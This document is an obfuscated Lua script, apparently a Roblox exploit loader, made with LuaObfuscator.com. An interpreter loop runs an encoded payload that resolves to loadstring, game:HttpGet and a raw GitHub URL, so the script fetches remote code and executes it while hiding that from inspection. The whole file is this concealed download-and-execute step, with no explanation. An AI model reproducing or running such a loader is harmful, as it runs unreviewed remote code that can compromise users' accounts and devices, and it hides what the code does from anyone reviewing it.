--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.5b) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (3==v0) then v10=setmetatable;v11=pcall;v12=select;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==5) then function v15(v16,v17)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==2) then function v23()local v39=0 + 0;local v40;local v41;while true do if ((0 -0)==v39) then v40,v41=v2(v16,v19,v19 + (757 -(44 + 711)));v19=v19 + ((1170 -(198 + 915)) -(45 + 10));v39=1 + 0 + 0;end if (v39==1) then return (v41 * (1079 -(202 + 621))) + v40;end end end v24=nil;function v24()local v42=0 -0;local v43;local v44;local v45;local v46;while true do if (v42==(3 -2)) then return (v46 * (16778333 -(702 + (1002 -587)))) + (v45 * 65536) + (v44 * (382 -(331 -205))) + v43;end if (0==v42) then v43,v44,v45,v46=v2(v16,v19,v19 + (1571 -(600 + 968)));v19=v19 + (370 -(90 + 276));v42=(1674 -(682 + 989)) -2;end end end v25=nil;v18=3;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v47=0 -0;local v48;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v47==(1171 -(761 + 408))) then v52=nil;v53=nil;v47=3;end if (v47==(0 + 0)) then v48=0;v49=nil;v47=3 -2;end if (v47==4) then while true do if (v48==1) then local v80=542 -(367 + 175);while true do if (v80==1) then v48=4 -2;break;end if (v80==(0 + 0)) then v51=nil;v52=nil;v80=1 -0;end end end if (v48~=(0 -0)) then else v49=0;v50=nil;v48=1 -0;end if (v48==3) then v55=nil;while true do local v81=0 -0;while true do if (v81~=1) then else if (v49==(0 + 0)) then local v100=0;local v101;while true do if ((0 -0)==v100) then v101=0;while true do if (v101==2) then v49=2 -1;break;end if (v101==(394 -(307 + 87))) then v50={};v51={};v101=1602 -(63 + 1538);end if (v101==1) then local v108=0;while true do if (v108==1) then v101=2;break;end if (v108~=0) then else v52={};v53={v50,v51,nil,v52};v108=1 + 0;end end end end break;end end end break;end if (v81~=0) then else local v83=0 + 0;while true do if (v83==0) then if (v49~=(2 + 0)) then else local v104=1444 -(1422 + 22);local v105;local v106;while true do if ((1875 -(1218 + 657))==v104) then v105=0 + 0;v106=nil;v104=990 -(299 + 690);end if (v104==(2 -1)) then while true do if (v105==(0 + 0)) then v106=0 -0;while true do local v114=1813 -(791 + 1022);local v115;while true do if (v114~=0) then else v115=0;while true do if (0~=v115) then else if (v106==(0 -0)) then local v140=1546 -(307 + 1239);while true do if (v140~=(1 + 0)) then else v106=1 + 0;break;end if (v140==0) then local v149=0;while true do if (v149==0) then for v158=1 + 0,v24() do local v159=0 + 0;local v160;while true do if (v159==(682 -(356 + 326))) then v160=v22();if (v21(v160,1 + 0,1)==0) then local v164=0 -0;local v165;local v166;local v167;local v168;while true do if (v164~=(1 + 0)) then else local v169=0;while true do if (v169~=0) then else v167=nil;v168=nil;v169=1615 -(507 + 1107);end if (1==v169) then v164=2;break;end end end if (v164==(0 + 0)) then local v170=0;while true do if (0==v170) then v165=0 + 0;v166=nil;v170=1;end if (v170==1) then v164=1;break;end end end if (v164~=2) then else while true do if (v165==1) then local v171=0;local v172;local v173;while true do if ((0 + 0)~=v171) then else v172=0 + 0;v173=nil;v171=1;end if (v171~=(1 + 0)) then else while true do if (v172==0) then v173=168 -(118 + 50);while true do if (v173==0) then local v181=0;while true do if (v181==(561 -(154 + 406))) then v173=1;break;end if (v181~=(0 + 0)) then else v168={v23(),v23(),nil,nil};if (v166==(0 -0)) then local v184=0 + 0;while true do if (v184==(1185 -(998 + 187))) then v168[3]=v23();v168[4 -0]=v23();break;end end elseif (v166==(1 + 0)) then v168[1 + 2]=v24();elseif (v166==(1214 -(402 + 810))) then v168[3 + 0]=v24() -(2^16);elseif (v166~=3) then else local v189=0;local v190;while true do if (0==v189) then v190=0;while true do if (0==v190) then v168[3]=v24() -((1428 -(11 + 1415))^(5 + 11));v168[4]=v23();break;end end break;end end end v181=1;end end end if (v173==(1 + 0)) then v165=2 -0;break;end end break;end end break;end end end if (v165==(2 + 0)) then local v174=0;while true do if (v174~=(1 -0)) then else v165=3;break;end if ((0 -0)==v174) then local v178=0;while true do if ((0 -0)~=v178) then else local v180=0;while true do if (0~=v180) then else if (v21(v167,1 + 0,1)~=1) then else v168[2]=v55[v168[1347 -(749 + 596)]];end if (v21(v167,491 -(35 + 454),1197 -(300 + 895))==(127 -(74 + 52))) then v168[3]=v55[v168[3]];end v180=1;end if (v180==(1555 -(100 + 1454))) then v178=1;break;end end end if (v178==(1478 -(930 + 547))) then v174=1;break;end end end end end if (v165==(0 + 0)) then local v175=1693 -(925 + 768);while true do if (v175==(0 + 0)) then local v179=0;while true do if (v179==(942 -(84 + 857))) then v175=1 + 0;break;end if (v179==0) then v166=v21(v160,2,3);v167=v21(v160,7 -3,10 -4);v179=1;end end end if (v175~=1) then else v165=1;break;end end end if (v165==3) then if (v21(v167,1 + 2,3 + 0)~=(1 + 0)) then else v168[4]=v55[v168[14 -(7 + 3)]];end v50[v158]=v168;break;end end break;end end end break;end end end for v161=1288 -(657 + 630),v24() do v51[v161-(133 -(106 + 26))]=v29();end v149=1561 -(738 + 822);end if (v149==(1 + 0)) then v140=1 + 0;break;end end end end end if (v106~=1) then else for v145=1 + 0,v24() do v52[v145]=v24();end return v53;end break;end end break;end end end break;end end break;end end end if (v49~=(1882 -(1740 + 141))) then else local v107=0 -0;while true do if (v107==0) then local v109=0;while true do if (v109~=(0 + 0)) then else v54=v24();v55={};v109=1 + 0;end if (1==v109) then v107=1;break;end end end if (v107==1) then local v110=0 -0;while true do if (v110~=(0 + 0)) then else local v113=951 -(144 + 807);while true do if (v113==(426 -(112 + 313))) then v110=1;break;end if (v113~=(760 -(578 + 182))) then else for v122=1,v54 do local v123=0 -0;local v124;local v125;local v126;local v127;while true do if (v123~=(1 + 0)) then else v126=nil;v127=nil;v123=2;end if (v123~=(653 -(105 + 546))) then else while true do if (v124==(1 + 0)) then v127=nil;while true do if (v125==(1750 -(1610 + 139))) then if (v126==1) then v127=v22()~=0;elseif (v126==(2 + 0)) then v127=v25();elseif (v126==(1141 -(841 + 297))) then v127=v26();end v55[v122]=v127;break;end if (v125==(0 + 0)) then local v155=0;local v156;while true do if (v155==0) then v156=0;while true do if ((1 + 0)==v156) then v125=1;break;end if ((0 -0)==v156) then local v163=0;while true do if (1==v163) then v156=1;break;end if (v163~=0) then else v126=v22();v127=nil;v163=1652 -(1361 + 290);end end end end break;end end end end break;end if (v124==(0 + 0)) then local v147=0;local v148;while true do if (v147==(0 + 0)) then v148=1512 -(871 + 641);while true do if (v148==1) then v124=1;break;end if (v148==(974 -(525 + 449))) then v125=1015 -(996 + 19);v126=nil;v148=1;end end break;end end end end break;end if (v123==0) then v124=0 + 0;v125=nil;v123=1;end end end v53[3]=v22();v113=2 -1;end end end if (v110==(1151 -(284 + 866))) then v107=2;break;end end end if ((1 + 1)==v107) then v49=86 -(74 + 10);break;end end end v83=3 -2;end if (v83==(4 -3)) then v81=1;break;end end end end end break;end if (v48==2) then v53=nil;v54=nil;v48=3;end end break;end if (v47==(6 -3)) then v54=nil;v55=nil;v47=4;end if (v47~=(1466 -(1050 + 415))) then else v50=nil;v51=nil;v47=8 -6;end end end v18=5;end if (0==v18) then v19=1;v20=nil;v16=v5(v4(v16,5),"..",function(v31)if (v2(v31,2)==79) then local v67=0;while true do if (v67==0) then v20=v1(v4(v31,1,1));return "";end end else local v68=0;local v69;while true do if (v68==0) then v69=v3(v1(v31,16));if v20 then local v82=v6(v69,v20);v20=nil;return v82;else return v69;end break;end end end end);v21=nil;v18=1;end if (v18==3) then function v25()local v56=v24();local v57=v24();return (( -(7 -5) * v21(v57,1688 -((1578 -(86 + 284)) + 448))) + 1) * (2^(v21(v57,1194 -(149 + (2063 -1039)),72 -41) -(1504 -((342 -193) + 103 + 229)))) * ((((v21(v57,1 -0,1627 -(1414 + 193)) * ((2 + 0)^32)) + v56)/((1 + 1)^(1793 -(1565 + 176)))) + 1 + 0);end v26=nil;function v26(v32)local v58;if  not v32 then v32=v24();if (v32==(0 + 0)) then return "";end end v58=v4(v16,v19,(v19 + v32) -(1 -0));v19=v19 + v32;local v59={};for v65=1, #v58 do v59[v65]=v3(v2(v4(v58,v65,v65)));end return v7(v59);end v27=v24;v18=4;end if (1==v18) then function v21(v33,v34,v35)if v35 then local v70=21 -(10 + 11);local v71;while true do if (v70==((1217 -(70 + 1147)) + 0)) then v71=(v33/(2^(v34-1)))%((5 -3)^(((v35-(2 -1)) -(v34-(1082 -(1048 + 33)))) + 1));return v71-(v71%1);end end else local v72=854 -(295 + 559);local v73;while true do if (0==v72) then v73=((2066 -(478 + 352)) -(162 + 1072))^(v34-(3 -2));return (((v33%(v73 + v73))>=v73) and ((73 + 258) -(242 + 88))) or (0 + 0);end end end end v22=nil;function v22()local v60=v2(v16,v19,v19);v19=v19 + 1;return v60;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v36,v37,v38)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v36[3];return function(...)local v74=0;local v75;local v76;local v77;local v78;local v79;while true do if (v74==3) then A,B=v28(v11(v79));if  not A[1] then local v84=v36[4][v75] or "?";error("Script error at ["   .. v84   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v74==1) then v77={...};v78=v12("#",...) -1;v74=2;end if (v74==0) then v75=1;v76= -1;v74=1;end if (v74==2) then v79=nil;function v79()local v85=v62;local v86=Const;local v87=v63;local v88=v64;local v89=v28;local v90={};local v91={};local v92={};for v96=0,v78 do if (((273 + 436)<=1266) and (v96>=v88)) then v90[v96-v88]=v77[v96 + (302 -(123 + 178))];else v92[v96]=v77[v96 + ((1519 -(133 + 203)) -(728 + 454))];end end local v93=(v78-v88) + (1680 -(562 + 1117));local v94;local v95;while true do local v97=0;local v98;local v99;while true do if (((288 -171)<=(6130 -(521 + 881))) and (v97==(3 -2))) then while true do if ((v98==((1239 -(478 + 333)) -(267 + 161))) or (4565==(4193 -(403 + 454)))) then v99=0 + 0;while true do if ((v99==((1438 -978) -(86 + 373))) or ((4500 -(908 + 183))<=2231)) then if ((1247==(2667 -1420)) and (v95<=(1 + 1))) then if (((3500 -(197 + 56 + 1624))==(1066 + 557)) and (v95<=(952 -(532 + 420)))) then local v117=0 -0;local v118;local v119;local v120;local v121;while true do if ((v117==(1658 -(295 + 1363))) or ((5468 -(1365 + 739))>(8879 -5243))) then v118=1352 -(1055 + 297);v119=nil;v117=1;end if ((v117==(3 -2)) or (3296==(603 + 401))) then v120=nil;v121=nil;v117=2 -0;end if (((4496 -2572)<=(8044 -3752)) and (v117==(1144 -(33 + 165 + 944)))) then while true do if ((v118==(1937 -(1853 + 66 + 17))) or ((3448 + 1220)>(6618 -(909 + (954 -(15 + 9)))))) then v121=nil;while true do if ((v119==(1 + 0)) or ((3906 + 548)<(5 + 4 + 0))) then v92[v120 + 1]=v121;v92[v120]=v121[v94[4]];break;end if ((2889>((1659 -(912 + 318)) + 1319)) and (v119==(1284 -(140 + (2324 -(421 + 759)))))) then local v152=(292 + 437) -(15 + 714);local v153;while true do if ((v152==(0 + 0)) or ((2654 -(562 + 141))>(617 + 1427))) then v153=0 + 0;while true do if ((1701<(1013 + 448 + 383)) and (v153==(0 -0))) then v120=v94[2 -0];v121=v92[v94[2 + 1]];v153=1 + 0;end if ((v153==(1542 -(111 + 160 + 1270))) or (527>(2983 -(544 + 451)))) then v119=4 -3;break;end end break;end end end end break;end if ((v118==(0 -(0 + 0))) or ((5500 -(287 + 1301))<(4836 -(190 + 1367 + 108)))) then local v141=1250 -(536 + (1347 -633));while true do if ((v141==0) or (1587>(1346 + 3340))) then v119=0;v120=nil;v141=2 -(1 + 0);end if (((4741 -(114 + 82))>=(1717 -(209 + 124))) and (v141==(2 -(1 -0)))) then v118=1 + 0;break;end end end end break;end end elseif ((v95==(1 + 0)) or ((8287 -5403)<=(1634 -848))) then v92[v94[1530 -(423 + 1105)]]=v94[2 + 1];else local v129=0 -0;local v130;while true do if ((v129==(1095 -((1053 -350) + 392))) or ((1567 + 2639)==((5734 -(1633 + 35)) -(1671 + 328)))) then v130=v94[2 + 0];v92[v130]=v92[v130](v13(v92,v130 + 1 + (0 -0),v76));break;end end end elseif (((9762 -5855)>=(6021 -4369)) and (v95<=(1 + 3 + 0))) then if ((v95==(1 + 2)) or ((5084 -(153 + 681))<(10308 -6271))) then do return;end else v92[v94[1 + 1]]=v38[v94[727 -(344 + 380)]];end elseif (((1827 + 14)>=(641 -((1427 -(1413 + 8)) + 532))) and (v95>5)) then local v132=0 + 0;local v133;local v134;local v135;local v136;while true do if (((908 -(13 + 6))<(12355 -7922)) and (v132==((2325 -(314 + 503)) -(881 + 625)))) then for v142=v133,v76 do local v143=29 -(25 + 4);local v144;while true do if ((v143==(0 -0)) or ((251 + 300)>(253 + 277 + 32))) then v144=0 -0;while true do if (((5503 -3619)>=(914 + 822)) and (v144==(0 -0))) then v136=v136 + (2 -1);v92[v142]=v134[v136];break;end end break;end end end break;end if ((v132==(0 + 0)) or ((3390 -(691 + 177))<((780 -596) + 408))) then v133=v94[476 -((640 -414) + 248)];v134,v135=v89(v92[v133](v13(v92,v133 + 1,v94[946 -(470 + 473)])));v132=1 -(0 + 0);end if ((v132==1) or ((81 + 1888)>=3208)) then local v139=0;while true do if ((v139==(104 -(31 + 72))) or ((2325 -975)<(629 -(104 + 24)))) then v132=2 -0;break;end if ((v139==(0 + 0)) or (4531<=(3875 -1162))) then v76=(v135 + v133) -(1388 -(270 + 257 + 860));v136=0;v139=1;end end end end else v92[v94[2 + 0 + 0]]();end v75=v75 + (210 -((149 -(95 + 41)) + 196));break;end if ((1539>=(4338 -2877)) and (v99==(574 -(334 + 240)))) then local v111=1391 -(1323 + 68);local v112;while true do if ((v111==(0 -0)) or ((1613 + 2983)<=527)) then v112=0;while true do if ((v112==(1184 -(896 + 287))) or ((582 + 271 + 1054)>=4887)) then v99=279 -((1904 -(1047 + 739)) + 160);break;end if (((371 + 3282)<((2838 -1680) + 3647)) and ((0 + 0)==v112)) then local v137=0;while true do if ((v137==(1790 -(894 + 895))) or ((3749 + 151)>(3030 + 1941))) then v112=1 + 0;break;end if (((2041 -1253)==(2385 -(1695 -(52 + 46)))) and (v137==0)) then v94=v85[v75];v95=v94[877 -(455 + 421)];v137=1 + 0;end end end end break;end end end end break;end end break;end if ((v97==(0 + 0)) or ((743 -(28 + 328))>(8017 -6104))) then v98=0 + 0;v99=nil;v97=1293 -(1137 + 155);end end end end v74=3;end end end;end if (v61==0) then v62=v36[1];v63=v36[2];v61=1;end end end return v30(v29(),{},v17)();end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E69676874536372697074732D4150492F736368656D792D312F6D61696E2F7870612E74787400083O0012043O00013O001204000100023O00202O000100010003001201000300044O0006000100034O00025O00022O00053O000100012O00033O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9());break;end if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (4==v0) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end end end